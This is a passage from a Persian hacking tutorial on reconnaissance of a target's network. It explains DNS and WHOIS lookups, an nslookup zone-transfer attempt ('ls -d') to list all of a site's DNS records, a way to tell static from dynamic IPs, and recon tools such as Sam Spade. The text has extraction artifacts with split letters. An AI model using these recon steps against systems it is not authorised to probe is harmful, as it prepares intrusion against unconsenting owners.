ﻧﻤﺎی ﮐﻠﯽ ﺏﻪ ﺷﻤﺎ ﺏﺪهﻢ ﺏﻌﺪ ریﺰ ﺟﺰﺋﻴﺎت را ﺏﮕﻢ . در ﺷﺒﮑﻪ هﺎی ﺏﺰرگ ) ﺕﺎﮐﻴﺪ ﻣﻴﮑﻨﻢ ﺏﺰرگ در ﺷﺒﮑﻪ ﮐﻮﭼﮑﺘﺮ ﺕﻤﺎم ﮐﺎرهﺎ را یﮏ ﻣﺎﺷﻴﻦ اﻧﺠﺎم ﻣﻴﺪه ﺪ ( ﺏ ﺮای اﻣﻨﻴ ﺖ و ﭘﺎی ﺪاری ﺱﻴ ﺴﺘﻢ ) ﻣﻨﻈ ﻮر ﻣﺠﻤﻮﻋﻪ ( یﮏ ﺁدرس ﺡﻮزﻩ ﮐﻠﯽ ایﺠﺎد ﻣﻴﮑﻨﺪ ،ﮐﻪ ﺁن ﺏﻪ ﮐﻞ ﺷﺒﮑﻪ اﺷﺎرﻩ ﻣﻴﮑﻨﺪ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﺎﺻﯽ ﻣﺜﻼ ﻣﺎیﮑﺮوﺱﺎﻓﺖ یﮏ ﺁدرس ﮐﻠﯽ دارد و ه ﺮ ﮐﺪام از زیﺮ ﺷﺒﮑﻪ هﺎ یﺶ یﮏ ﺁدرس یﮑﺘﺎ ﺧﺎص دارﻧﺪ ﻣﺜﻞ ﺱﻴﺴﺘﻢ ایﻤﻴﻞ و ﺱﻴﺴﺘﻢ FTPو ...ایﻦ ﻣﺎﺷﻴﻨﻬﺎ ﮐﻪ هﺮ ﮐﺪام ﮐﺎر ﻣﺠﺰایﯽ اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﻧﺎﻣﯽ ﻣﺸﺎﺏﻪ xxxxxxxx.microsoft.comدارد ﮐﻪ ﺏﻪ ﺟﺎی ﺡﺮوف xﻧﺎم ﻣﺎﺷﻴﻦ ﻗﺮار ﻣﻴﮕﻴﺮد. ﺏﺮای ایﻨﮑﻪ ایﻦ ﻣﺎﺷﻴﻨﻬﺎ ﺏﺘﻮاﻧﻨﺪ در ﺷﺒﮑﻪ ) ﻣﻨﻈﻮر هﻢ ایﻨﺘﺮﻧﺖ و ﺷﺒﮑﻪ داﺧﻠﯽ( اﺱﺖ ﮐﺎر ﺏﮑﻨﻨﺪ ﺏﺎیﺪ هﻤ ﺎﻧﻄﻮر ﮐ ﻪ ﮔﻔﺘ ﻪ ﺷ ﺪ ی ﮏ ﺁدرس یﮑﺘ ﺎ داﺷ ﺘﻪ ﺏﺎﺷﻨﺪ ﺏﺮای ایﻦ ﮐﺎر از یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ﺧﺎص ﺏﻪ ﻧﺎم DNSﺏﺎیﺪ ﺏ ﺮ روی ی ﮏ ﻣﺎﺷ ﻴﻦ ﻧ ﺼﺐ ﮐﻨﻨ ﺪ و روی ﺁن ﻣﺎﺷ ﻴﻦ ﺁدرﺱ ﻬﺎ و IPﺷ ﺒﮑﻪ را ﺙﺒﺖ ﮐﺮد ﺏﻌﺪ ای ﻦ ﺁدرس ﻣﺎﺷ ﻴﻦ DNSرا ﮐ ﻪ ﺁدرس ه ﺎی زی ﺮ ﺷ ﺒﮑﻪ را دارد در ﺏﺎﻧ ﮏ اﻃﻼﻋ ﺎت ﺟﻬ ﺎﻧﯽ DNSﮐ ﻪ ﺁدرس ﮐﻠ ﯽ را درﺁن ﺙﺒ ﺖ ﮐﺮدﻩ اﻧﺪ ﺙﺒﺖ ﻣﻴﺸﻮد و ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ایﻦ روش اﻣﮑﺎن دﺱﺘﺮﺱﯽ ﺏﻪ زیﺮ ﺷﺒﮑﻪ و اﻣﮑﺎﻧﺎت ﺱﺎیﺖ ﻣﻴﺒﺎﺷﺪ. ﮐﻪ ﻣﺎ ﺏﺎ ﺕﻤﺎس ﺏﺎ ﺁن DNSاﻃﻼﻋﺎﺕﯽ در ﺏﺎرﻩ ﻣﺎﺷﻴﻨﻬﺎ و ﮐﺎر ﺁﻧﻬﺎ و ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار ﺱﺮویﺲ دهﻨﺪﻩ روی هﺮ ﻣﺎﺷﻴﻦ و ...ﺏﺪﺱ ﺖ ﻣ ﯽ ﺁوری ﻢ ﮐ ﻪ اول ﺏﺎیﺪ ﺧﻮد ﺁن ﮐﺎﻣﭙﻴﻮﺕﺮ DNSو ﺁدرس IPﺁﻧﺮا ﭘﻴﺪا ﮐﻨﻴﻢ ﮐﻪ ﻣﺎ WHOISرا ﺏﺮای ایﻦ ﮐﺎر ﻣﻴﺨﻮاهﻴﻢ !! ﺧﻮب ایﻦ هﻢ یﮏ ﻧﻤﺎی ﮐﻠﯽ در ایﻦ ﺏﺎرﻩ و ﻣﻄﻠﺐ ﺏﻌﺪ. ﮐﺴﺐ اﻃﻼﻋﺎت در ﻣﻮرد ﻧﺎﻣﻬﺎی ﺡﻮزﻩ ) ( Domain Name Serverﺏﺎ ﭘﺴﻮﻧﺪ orgو comو : net ﻗﺎﺏﻞ ذﮐﺮ اﺱﺖ ﺕﺎ ﻗﺒﻞ از ﺱﺎل ١٩٩٩ﺷﻮﻓﺮی ایﻦ ﮐ ﺎر ﻣﻨﺤ ﺼﺮا ﻣﺘﻌﻠ ﻖ ﺏ ﻪ ﺷ ﺮﮐﺖ Network Solutionsﺏ ﻮد .در ای ﻦ ﺱ ﺎل ) (١٩٩٩ﺕ ﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺷ ﺪ ﺕﻮﺱ ﻂ ICANNﮐ ﻪ ﺙﺒ ﺖ ﻧ ﺎم را از ﺡﺎﻟ ﺖ اﻧﺤ ﺼﺎری ﺧ ﺎرج ﮐ ﺮدﻩ و ﺕﺤ ﺖ ی ﮏ روال ﻗ ﺎﻧﻮﻧﯽ در ﺁورد و ﺏ ﻪ ﺷ ﺮﮐﺘﻬﺎی واﺟ ﺪ ﺷ ﺮایﻂ واﮔﺬار ﻧﻤﺎیﺪ .ﺏﺎ ایﻦ ﮐﺎر رﻗﺎﺏﺖ ﺧﻔﻨﯽ در ﮔﺮﻓﺖ ﮐﻪ ﺏﺎﻋﺚ ﺷﺪ ﺕﺎ ﺏﻌﻀﯽ ﺷﺮﮐﺘﻬﺎ ﺏ ﺎ دریﺎﻓ ﺖ ﻣﻘ ﺪاری ﻓ ﻀﺎ از ﺱ ﺮور وب ﺱ ﺎیﺖ ﺷ ﻤﺎ ،رایﮕ ﺎن ﻧ ﺎم ﺷﻤﺎ را ﺙﺒﺖ ﮐﻨﻨﺪ ) ﻗﺎﺏﻞ ﺕﻮﺟﻪ ﺏﺮ ﺏﭽ ﻪ ه ﺎیﯽ ﮐ ﻪ ﺷ ﺪیﺪ اﻧ ﺪ دﻧﺒ ﺎل وب ﺱ ﺎیﺖ ﻣﺠ ﺎﻧﯽ ه ﺴﺘﻨﺪ "اﻟﺒﺘ ﻪ ای ﻦ روش را ﺏﻄ ﻮر ﮐﺎﻣ ﻞ در ﻣﻘ ﺎﻻت ﺏﻌ ﺪی ه ﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺕﺎ ﺏﺪون ﺧﺎرج ﺷﺪن ﺡﺘﯽ یﮏ ریﺎل از ﺟﻴﺐ ﻣﺒﺎرک داری یﮏ وب ﺏﺎﺡﺎل ﺷﻮیﺪ " ( . اوﻟﻴﻦ ﮔﺎم در ﺷﻨﺎﺱﺎیﯽ ﺻﺎﺡﺒﺎن یﮏ ﺁدرس ﺏﺎ ﭘﺴﻮﻧﺪهﺎی ﺏﺎﻻ رﻓﺘﻦ ﺏﻪ یﮑﯽ از ﺱﺎیﺘﻬﺎی : HTTP://WWW.SAMSPADE.ORG/T/WHOIS?A=TRU2.COM HTTP://WWW.INTERNIC.NET/WHOIS.HTML HTTP://WWW.ARIN.NET
ﻧﮑﺘﻪ در ﺁدرس اوﻟﯽ ﺏﻪ ﺟﺎی TUR2.COMﺁدرس ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﺏﻨﻮیﺴﻴﺪ اﺱﺖ .اﻃﻼﻋﺎﺕﯽ ﮐﻪ ﺏﻌﺪ از وارد ﮐﺮدن ﻧﺎم ﺱﺎیﺖ ﺏﻪ ﺷﻤﺎ دادﻩ ﻣﻴﺸﻮد ﻋﺒﺎرﺕﻨﺪ از: -١ﻧﺎم ﺷﺮﮐﺖ ﺙﺒﺖ ﮐﻨﻨﺪﻩ ﻧﺎم ) . ( Registrar -٢ﻧﺎم ﺱﺮویﺲ دهﻨﺪﻩ . Whois -٣ﻧﺎم ﺱﺮویﺲ دهﻨﺪﻩ هﺎی ﻧﺎم ﺷﺮﮐﺖ یﺎ ﻣﻮﺱﺴﻪ ﺻﺎﺡﺐ ﻧﺎم. ﺏﻌﺪ از ﺏﺪﺱﺖ ﺁوردن ایﻦ اﻃﻼﻋﺎت ﺏﻪ ﺱﺎیﺖ ﺷﺮﮐﺖ ﺙﺒﺖ ﮐﻨﻨﺪﻩ اﻃﻼﻋﺎت رﻓﺘﻪ و ﺁﻧﺠﺎ ایﻦ ﻋﻤﻞ را ﺕﮑ ﺮار ﻣﻴﮑﻨ ﻴﻢ ﺕ ﺎ اﻃﻼﻋ ﺎت ﺏﻴ ﺸﺘﺮی دﺱ ﺖ ﭘﻴ ﺪا ﮐﻨﻴﻢ ﺡﺎﻻ اﻃﻼﻋﺎت را یﮏ ﺟﺎیﯽ ذﺧﻴﺮﻩ ﮐﻨﻴﺪ ﺕﺎ ﺏﮕﻢ ﺏﻌﺪا ﺏﺎ ﻣﻴﻞ ﺏﻪ ﻣﻴﻞ ﺁن ﭼﻪ ﮐﺎر ﺏﺎیﺪ ﮐﺮد ﮐﻪ ﺧﻴﻠﯽ ﺏﻪ درد ﻣﯽ ﺧﻮرد . ﺧﻮب یﮏ ﺱﻮال ﻣﻬﻢ ایﻨﺠﺎ ﻣﻄﺮح ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ ﭘﺴﻮﻧﺪ ﺱﺎیﺖ ﻣﻮرد ﻧﻈﺮ ﻣﺎ ﭘﺴﻮﻧﺪهﺎی ﺏﺎﻻ ﻧﺒﻮد ﭼﮑ ﺎر ﮐﻨ ﻴﻢ؟ ﺧ ﻮب در ﺟ ﻮاب ای ﻦ ﺱ ﻮال ﮐﻠ ﯽ و ﺟﺎﻣﻊ ﺟﻮاب ﻣﻴﺪهﻢ ﺕﺎ ﻣﺸﮑﻠﯽ ﺏﺮای ﺷﻤﺎ ﭘﻴﺶ ﻧﻴﺎیﺪ را ﺡﻞ ایﻦ ﻣﺴﺌﻠﻪ ایﻦ اﺱﺖ ﮐﻪ ﺏﻪ ﺱﺎیﺖ: HTTP://WWW.ALLWHOIS.COM/HOME.HTML
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٤
رﻓﺘﻪ در ایﻦ ﺁدرس ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ ﺙﺒﺖ ﮐﻨﻨﺪﻩ ﻧﺎم ﺏﻴﺶ از ۶٠ﮐﺸﻮر ﺟﻬﺎن را ﺏﺒﻴﻨﻴﺪ از ﺟﻤﻠ ﻪ . irاﻟﺒﺘ ﻪ ﻣﺠﻤﻮﻋ ﻪ ﺁدرﺱ ﻬﺎی NIC هﻢ ﺧﻮب اﺱﺖ و راﻩ ﮔﺸﺎ ﻣﺜﻞ: http://whois.nic.ir/ http://whois.nic.gov http://whois.nic.mil/ و .... ﺧﻮب ﻣ ﺎ ﺡ ﺎﻻ ی ﮏ ﺱ ﺮی اﻃﻼﻋ ﺎت ﺏﺪﺱ ﺖ ﺁوردﻩ ای ﻢ ﻣﺜ ﻞ ﺷ ﺮﮐﺖ ﺙﺒ ﺖ ﮐﻨﻨ ﺪﻩ ﺁدرس ،ﺏ ﻪ ﺱ ﺮاغ ﺁن ﻣﻴ ﺮویﻢ و ﻣ ﺴﺘﻘﻴﻤﺎ در ﺁن ﺟ ﺎ ی ﮏ Whois اﺱﺎﺱﯽ ﻣﻴﮑﻨﻴﻢ ﺕﺎ اﻃﻼﻋﺎت ﺏﻴﺸﺘﺮی را ﺏﺪﺱﺖ ﺏﻴﺎوریﻢ اﻃﻼﻋﺎﺕﯽ ﮐﻪ ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ﺏﻴﺶ از %٩٠اوﻗﺎت ﻋﺎﻟﯽ اﺱﺖ ﺡﺎل ﻣﻌﻤﻮﻻ ﺏﻪ ﻣﺎ ﻣﯽ ﮔﻮیﺪ : -١ﺁدرس IPﺱﺎیﺖ یﺎ ﺏﻪ ﻧﻮﻋﯽ ﻣﻴﺸﻮد ﮔﻔﺖ ﺁدرس http serverرا ﻣﻴﮕﻮیﺪ . -٢ﺁدرس و ﻣﺸﺨﺼﺎت DNSرا ﮐﻪ ﺧﻴﻠﯽ ﺏﺪرد ﻣﻴﺨﻮرد. -٣ﺁدرس و ﻣﺸﺨﺼﺎت ﺷﺨﺼﯽ ﮐﻪ ﺁدرس را در ﺷﺒﮑﻪ ﺙﺒﺖ ﮐﺮدﻩ اﻟﺒﺘﻪ ﻧﻤﻴﺸﻮد درﺏﺎرﻩ ﺻﺤﺖ ﺁن ﻧﻈﺮ داد ).اﮐﺜﺮا ﻣﻬﻢ ﻧﻴﺴﺖ( NIC handle -۴ﮐﻪ یﻌﻨﯽ ی ﮏ ﺷﻨﺎﺱ ﻪ دﻩ ﮐ ﺎراﮐﺘﺮی اﺱ ﺖ ﮐ ﻪ ﺏ ﻪ ﻋﻨ ﻮان ﮐ ﺪ یﮑﺘ ﺎ رﮐ ﻮرد اﻃﻼﻋ ﺎت ﻣﺮﺏﻮﻃ ﻪ را در ﺏﺎﻧ ﮏ اﻃﻼﻋ ﺎﺕﯽ Whois ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﻣﻴﮕﻢ ﭼﮑﺎر اﺱﺖ ﺏﻌﺪا . یﮏ ﻧﮑﺘﻪ اﮔﺮ ﺏﻴﺶ از یﮏ IPو ﺁدرس ﺏﺮای DNSﭘﻴﺪا ﮐﺮدیﺪ ﺕﻌﺠﺐ ﻧﮑﻨﻴﺪ ﻣﻌﻤﻮﻻ ﺱﺎیﺖ ه ﺎی ﺏ ﺰرگ ﭼﻨ ﺪ ﺕ ﺎ ﺁدرس DNSدارﻧ ﺪ ﮐ ﻪ اﮔ ﺮ ﺧ ﺪا ﺧﻮاﺱﺖ اوﻟﯽ ﭘﮑﻴﺪ دوﻣﯽ ﮐﺎرا را اﻧﺠﺎم ﺏﺪهﺪ و ﺱﻴﺴﺘﻢ ﻧﺨﻮاﺏﺪ ﻣﺎ ﺏﺮای ﮐﺎرهﺎیﻤﺎن ﻣﻌﻤﻮﻻ از اوﻟﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ وﻟﯽ اﮔﻪ ﺏﻪ هﺮ دﻟﻴﻠﯽ ﺟ ﻮاب ﻧ ﺪاد از ﺏﻌﺪی هﺎ ﺏﻪ ﺕﺮﺕﻴﺐ ﺷﻤﺎرﻩ اش اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺧﻮب ایﻨﺎ ﺏﺎیﺪ هﻤﻴﺸﻪ ﺏﺮوز ﺏﺎﺷﻦ ﺕﺎ ﺁدرس هﺎ درﺱﺖ ﮐﺎر ﮐﻨﺪ ﺏﺮای هﻤﺎهﻨﮕﯽ و ﺏﻪ روز ﺏﻮدن ﺁﻧﻬﺎ از ﺁن دﻩ ﮐ ﺎراﮐﺘﺮ اﺱ ﺘﻔﺎدﻩ ﻣﻴ ﺸﻮد ﻣﻌﻤ ﻮﻻ ﺏ ﺮای ﺕﺒ ﺎدل اﻃﻼﻋ ﺎت از ﭘ ﻮرت udp ۵٣اﺱ ﺘﻔﺎدﻩ ﻣ ﯽ ﮐﻨﻨ ﺪ ﮐ ﻪ ﺏ ﺎ ی ﮏ telnetﺱ ﺎدﻩ ﻣﻴ ﺸﻮد ﮐﻠ ﯽ اﻃﻼﻋﺎت ﺏﺪﺱﺖ ﺁورد اﻟﺒﺘﻪ راﻩ اﺻﻠﯽ اش اﺱﺘﻔﺎدﻩ ار ﻓﺮﻣﺎن nsllokupاﺱﺖ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﭼﻪ ﺟﻮری ﮐﺎر ﻣﻴﮑﻨﺪ . ﻣﺜﺎل :ﻧﺪاریﻢ ﻓﻌﻼ !!!! زﻧﮓ ﺕﻔﺮﻳﺢ!!! یﮏ ﻧﮑﺘﻪ ﮐﻮﭼﻮﻟﻮ اﺱﺖ ﮐﻪ ﮐﻤﯽ ﺏﺎ ﺡﺎل اﺱﺖ داﻧﺴﺘﻦ اش هﻤﺎن ﻃﻮر ﮐ ﻪ ﻓﻬﻤﻴﺪی ﺪ ﻓﺮایﻨ ﺪ ﺁوردن ی ﮏ ﺻ ﻔﺤﻪ از ی ﮏ ﺱ ﺎیﺖ ﮐﻤ ﯽ وﻗ ﺖ ﮔﻴ ﺮ اﺱ ﺖ ﺏﺮای ﺱﺮﻋﺖ ﺏﺨﺸﻴﺪن ﺏﻪ ایﻦ ﮐﺎر ﻣﺎ یﮏ ﻓﺎی ﻞ دﺱ ﺖ ﮐ ﺎری ﮐ ﺮدﻩ ﺕ ﺎ ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﻣ ﺎن ه ﺮ وﻗ ﺖ ﺏ ﺎ ﺁن ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﮐ ﺎر داﺷ ﺖ دیﮕ ﻪ ﺱ ﺮاغ DNSان ﺱﺎیﺖ ﻧﺮود ﻣﺴﺘﻘﻴﻤﺎ ﺁدرس را ﺧﻮدش ﺏﺪاﻧﺪ و ﺱﺮاغ اون ﺏﺮود. ﺏﻪ ﭘﻮﺷﻪ c:\windows\hostﺏﺮوی ﺪ در ویﻨ ﺪوز ه ﺎی 9xو در ﺱ ﺮی NTﺏ ﻪ ﭘﻮﺷ ﻪ c:\winnt\system32\drivers\etc\hostsﺏﺮوی ﺪ و ﻓﺎیﻞ hostsﺏﺎز ﮐﺮدﻩ ﺏﺎ notepadو ﺧﻄﻮﻃﯽ را ﺏﻪ ﺷﻴﻮﻩ زیﺮ ﺏﻪ ﺁن اﺽﺎﻓﻪ ﮐﻨﻴﺪ. ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﮐﻪ IPﺱﺎیﺖ www.xxxx.comﺏﺮاﺏﺮ ٠٠٠٫٠٠٠٫٠٠٠٫٠٠٠اﺱﺖ ﺁﻧﮕﺎﻩ ﺏﺎ اﺽ ﺎﻓﻪ ﮐ ﺮدن ﺧ ﻂ زی ﺮ در ﻓﺎی ﻞ ، hostsﻣ ﺮور ﮔ ﺮ دیﮕﺮ ﺟﺴﺘﺠﻮ اﻧﺠﺎم ﻧﻤﯽ دهﺪ و یﮏ راﺱﺖ ﺏﻪ ﺱﺮاغ ﺏﺮ ﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﺁدرس ایﻨﺘﺮﻧﺘﯽ ﺱﺎیﺖ ﻣﻴﺮود. 000.000.000.000 www.xxxx.com ﺏﺎ ایﻦ ﮐﺎ ﺱﺮﻋﺖ دﺱﺖ رﺱﯽ ﺷﻤﺎ اﻓﺰایﺶ ﭘﻴﺪا ﻣﻴﮑﻨﺪ ﺏﻪ ﻓﻘﻂ ﺱﺎیﺘﯽ ﮐﻪ ﺏﺎ ایﻦ ﺷﻴﻮﻩ ﺏﻪ ﻓﺎیﻞ ﻣﻮرد ﻧﻈﺮ اﺽﺎﻓﻪ ﮐﺮدﻩ ایﺪ ،یﮏ راﻩ اﺱﺎس ﺕﺮ ،ﮐﻪ ﻣﻦ ﺧﻴﻠﯽ ﻗﺒﻮل دارم اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰار ONspeedایﻦ وﺱﻴﻠﻪ ﺏﻪ ﻣﺮور ﮔﺮ ﺷﻤﺎ یﮏ ﻋﺪد IPاﺧﺘ ﺼﺎص ﻣﻴﺪه ﺪ و دیﮕ ﺮ ﺻ ﻔﺤﺎت ﺷ ﻤﺎ در ﺱ ﺮور ﺕﺎن ﻧﻤﯽ ﺁیﺪ و ﻣﺴﺘﻘﻴﻤﺎ ﭘﻴﺶ ﺷﻤﺎ ﻣﯽ ایﺪ .اﻣﺘﺤﺎن ﮐﻨﻴﺪ ﻣﻌﺘﺎد ﻣﻴﺸﻮد اﻧﺸﺎء اﷲ .اﻟﺒﺘﻪ ﺏﺎهﺎش ﮐﺎرهﺎی زیﺎدی ﻣﻴﺸﻮد ﮐﺮد ﺧﻮدﺕﺎن اﻣﺘﺤﺎن ﮐﻨﻴﺪ . -۴ﮔﺮﻓﺘﻦ اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ DNS ﺡﺎﻻ رﺱﻴﺪیﻢ ﺏﻪ دو ﻣﻄﻠﺒﯽ ﮐﻪ از اول ﻣ ﯽ ﺧﻮاﺱ ﺘﻢ در ﺏ ﺎرﻩ اش ﺕﻮﺽ ﻴﺢ ﺏ ﺪم و ﻣﺠﺒ ﻮر ﺷ ﺪم ﺏ ﻪ ای ﻦ هﻤ ﻪ ﺕﻮﺽ ﻴﺢ اﺽ ﺎﻓﻪ اﻟﺒﺘ ﻪ ﺏ ﺪ ه ﻢ ﻧﺒ ﻮد ﺡﻤ ﻼت WAR DIALERرا ﮐﺎﻣﻼ ﺕﻮﺽﻴﺢ دادم دیﮕﻪ ﺏﺲ اﺱﺖ ﺡﺮف اﺽﺎﻓﻪ ﻣﻴﺮیﻢ ﺱﺮ اﺻﻞ ﻣﻄﻠﺐ . ﻣﻘﺪﻣﻪ : DNSاول ﮐﻠﻤﺎت Domain Name Serverاﺱﺖ و یﻌﻨﯽ ﺱﻴﺴﺘﻢ ﻧﺎم ﮔﺬاری ﺡﻮزﻩ. ﺧﻮب ﺏﺮﮔﺮدیﻢ ﺱﺮ ﮐﺎرﻣﺎن ﻣﻴﺨﻮاﺱﺘﻢ درﺏﺎرﻩ دﺱﺘﻮر nslookupیﮏ ﺱﺮی ﺕﻮﺽﻴﺢ ﺏﺪهﻢ . اوﻻ ﺏﮕﻢ ایﻦ دﺱﺘﻮر ﺏﺮای ﮔﺮﻓﺘﻦ رﮐﻮرد هﺎی داﺧﻞ DNSاﺱﺖ .اﻣﺎ یﮏ ﭼﻨﺪ ﺕﺎ ﮐﺎر دیﮕﻪ هﻢ ﻣﻴﮑﻨﻪ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺏﻪ ﺷﻤﺎ ایﻦ دﺱﺘﻮر در ﺧﻂ ﻓﺮﻣﺎن ) ﺏﺎ ﻧﻮﺷﺘﻦ CMDدر RUNﻣﻴﺘﻮاﻧﻴﺪ از ﺧﻂ ﻓﺮﻣﺎن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ( ﮐﺎر ﻣﻴﮑﻨﺪ. در ﺧﻂ ﻓﺮﻣﺎن ﻣﯽ ﻧﻮیﺴﻴﻢ: Nslookup ﭘﺲ از اﺟﺮای دﺱﺘﻮر ﺏﺎیﺪ ﺏﺎ ﻓﺮﻣﺎن serverﻧﺎم ﺱﺮور را ﺏﻪ ﺏﺮﻧﺎﻣﻪ داد ﺏﻪ ایﻦ ﺻﻮرت : Server xxxxxxxxxx ﮐﻪ ﺏﻪ ﺟﺎی xهﺎ ﻧﺎم DNSﺱﺎیﺖ را ﻣﻴﻨﻮیﺴﻴﻢ ) IPﺏﻮد اﺷﮑﺎل ﻧﺪارد ( ﺏﻌﺪ ﻓﺮﻣﺎن زیﺮ را در ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﻨﻮیﺴﻴﻢ :
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
١٥
Set type=any ﺏﺎ ﻧﻮﺷﺘﻦ ایﻦ دﺱﺘﻮر ﻣﻴﮕﻴﻢ هﺮ ﺁن ﭼﻪ هﺴﺖ ﺏﺮای ﻣﺎ ﺏﻔﺮﺱﺘﺪ وﺏﺎ ﻓﺮﻣﺎن زیﺮ ﺕﻤﺎم رﮐﻮرد هﺎ را ﻣﻴﮕﻴﺮیﻢ : Ls –d xxxxxxxxxx . ﮐﻪ ﺏﺠﺎی xxxهﺎ ﻧﺎم ﺱﺎیﺖ را ﻣﻴﻨﻮیﺴﻴﻢ ) ﺏﺪون ( wwwﺡﺘﻤﺎ ﻧﻘﻄﻪ را ﺁﺧﺮش ﺏﮕﺰاریﺪ. ﺧﻮب ﮐﺎر اﺻﻠﯽ ایﻦ دﺱﺘﻮر ﺏﻪ ﺷﻤﺎ هﺎ ﮔﻔﺘﻢ اﻣﺎ دوﺕﺎ ﮐﺎرایﯽ دیﮕﻪ هﻢ دارد ﮐﻪ ﻣﻴﮕﻢ: -١ﺏﺮای ﺕﺸﺨﻴﺺ ایﻨﮑﻪ ﺁیﺎ IPاﺱﺘﺎﺕﻴﮏ یﺎ دیﻨﺎﻣﻴﮏ IP .هﺎی اﺱﺘﺎﺕﻴﮏ )ﺙﺎﺏﺖ( IPهﺎی هﺴﺘﻦ ﮐﻪ ﮐﺎﻣﭙﻴﻮﺕﺮ هﺎی ﮐﻪ هﻤﻴﺸﻪ در ﺷﺒﮑﻪ ه ﺴﺘﻦ ﺁﻧﻬﺎ دارﻧﺪ ﻣﺜﻞ وب ﺱﺮور هﺎ ،هﺎﺱﺘﻴﻨﮓ هﺎ و ...اﻣ ﺎ IPه ﺎی دیﻨﺎﻣﻴ ﮏ )ﻣﺘﻐﻴ ﺮ( IPه ﺎی ه ﺴﺘﻦ ﮐ ﻪ ﻣ ﻦ ﺷ ﻤﺎ داری ﻢ و ﻟﺤﻈ ﻪ ای اﺱ ﺖ ﻣ ﺎل ﺷﺨﺺ ﺙﺎﺏﺖ ﻧﻴﺴﺖ ﻣﻌﻤﻮﻻ هﻤﻪ ﮐﻪ ﺏﺎ ﻣﻮدم ﻣﻴﺮن ﺏﺎﻻ از ایﻦ ﻧﻮع IPدارﻧﺪ. ﻓﺮﻣﺎن nslookupرا در ﺧﻂ ﻓﺮﻣﺎن ﺏﻪ ﺻﻮرت زیﺮ اﺟﺮا ﻣﻴﮑﻨﻴﻢ Nslookup hostname ﮐﻪ ﺏﻪ ﺟﺎی hostnameﻣﺎ IPﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﻣﻴﻨﻮیﺴﻴﻢ.اﮔﺮ ﻧﺘﻴﺠﻪ ایﻦ ﺏﻮد ﮐﻪ ایﻦ ﻣﻴﺰﺏﺎن وﺟﺪ ﻧﺪارد ﻃﺮف ﻣﺎ دیﻨﺎﻣﻴﮏ اﺱﺖ وﻟ ﯽ اﮔ ﺮ اﺱ ﻢ ﻣﻴﺰﺏﺎن را ﺏﻪ ﻣﺎ ﺏﺪهﺪ ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﺪ ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ اﺱﺘﺎﺕﻴﮏ اﺱﺘﺎﺕﻴﮏ اﺱﺖ . -٢ایﻦ یﮑﯽ را زیﺎد ﺕﻮﺽﻴﺤﺎت ﻧﻤﻴﺪهﻢ ﺕﺎ ﺧﻮدﺕﻮن هﻢ یﮏ ذرﻩ ﺕﻼش ﮐﻨﻴﺪ !! ) یﮏ راهﻨﻤﺎیﯽ داﺧﻞ Helpیﮏ ﺟﺴﺘﺠﻮ ﮐﻨﻴﺪ ( -۵ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺑﻮﻃﻪ ﺷﺎیﺪ ﺕﺎ ﺏﻪ ﺡﺎل ﻓﮑﺮ ﮐﻨﻴﺪ یﮑﻢ ﮐﺎر ﺱﺨﺘﻪ وﻟﯽ اﺕﻔﺎﻗﺎ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ یﮏ ﭼﻨﺪ ﻧﺮم اﻓﺰار ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﺕﺎ ﮐﻤﯽ راﺡﺖ ﺕﺮ ﺏﺸﻮد . Sam Spade -١ NET INFO -٢ Net Scan Tools -٣ . WS-Ping Pro Pack -۴ -۵و... -١اﺏﺰار هﻤﻪ ﻣﻨﻈﻮرﻩ : Sam Spade
ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل ﺷﺎیﺪ اﺱﻢ ایﻦ زیﺎد ﺷﻨﻴﺪﻩ ﺏﺎﺷﻴﺪ .اﺏﺰار ﺱﺎدﻩ ای و اﻟﺒﺘ ﻪ ﮐﺎﻣ ﻞ ﺏ ﺮای ﺷﻨﺎﺱ ﺎیﯽ ﻣﻘ ﺪﻣﺎﺕﯽ ه ﺪف اﺱ ﺖ .ای ﻦ اﺏ ﺰار رایﮕ ﺎن اﺱ ﺖ و ﻣ ﯽ ﺕﻮاﻧﻴﺪ از ﺁدرس http://www.samspade.orgﺏﮕﻴﺮیﺪ روی ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز ﮐﺎر ﻣﻴﮑﻨﺪ دیﮕﻪ هﻴﭽﯽ . دارای ﻗﺎﺏﻠﻴﺖ هﺎی زیﺮ ﻣﯽ 